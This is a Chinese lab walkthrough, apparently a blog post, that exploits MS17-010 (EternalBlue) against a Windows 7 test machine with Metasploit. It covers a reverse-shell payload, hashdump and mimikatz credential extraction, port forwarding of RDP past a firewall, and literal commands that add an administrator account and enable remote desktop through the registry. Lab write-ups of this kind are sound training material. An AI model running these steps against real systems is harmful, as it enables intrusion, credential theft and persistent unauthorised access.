MS17-010远程溢出漏洞(永恒之蓝)

MS17-010远程溢出漏洞(永恒之蓝)

实验环境

操作机:kali 2017

操作机IP:172.16.11.2

目标机:windows7

目标机IP:172.16.12.2

 

 

打开nmap进行扫描目标主机开放哪些端口

终端打开msfconsole

使用search 命令查找ms17-010漏洞相关模块

使用use 命令选择我们要使用的扫描模块

在运行模块之前,需要设置相关选项,我们使用show options 查看配置信息

需要设置目标地址,设置命令

设置完成后,执行run 或exploit命令,等执行结果

从上一步可以看出,该漏洞可以被利用,接下来,我们使用漏洞利用模块

show options 查看

目标机,host地址172.16.12.2

set RHOST 172.16.12.2

选择载荷payload,也就是shellcode。此处我们选择回连控制端shell的payload

同样,载荷也需要进行配置,show options查看配置信息

配置中缺少本地主机RHOST,设置一下

完成后运行run或exploit

我们已经成功获取Session会话了,本次我们继续获取目标机hash值,执行hashdump

mimikatz是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等,meterpreter中正集成了这款工具。

执行load mimikatz即可加载该工具,其命令与mimikatz一样(可能不行,一般是弱命令)

然后执行kerberos即可获得目标机账号密码

获取了目标机的账号密码,我们结合nmap的扫描结果,可以远程登陆目标机 但是现实中,防火墙一般会拦截外来3389端口的访问请求,这种情况下该怎么解决呢?

我们可以使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接

运行命令:portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.12.2

此处,我们将远程目标的3389端口,转发到本机 172.16.11.2的3389上

本地端口号可设置为其他未监听的端口

如此,我们只要执行

rdesktop 127.0.0.1 -u ichunqiu -p ichunqiu

即可登陆远程目标机器

1.shell进入C盘

2net user 用户名 密码 /add

3.net localgroup Administrators 用户名 /add

4.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

5.net -ano | findstr "3389"

 

 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值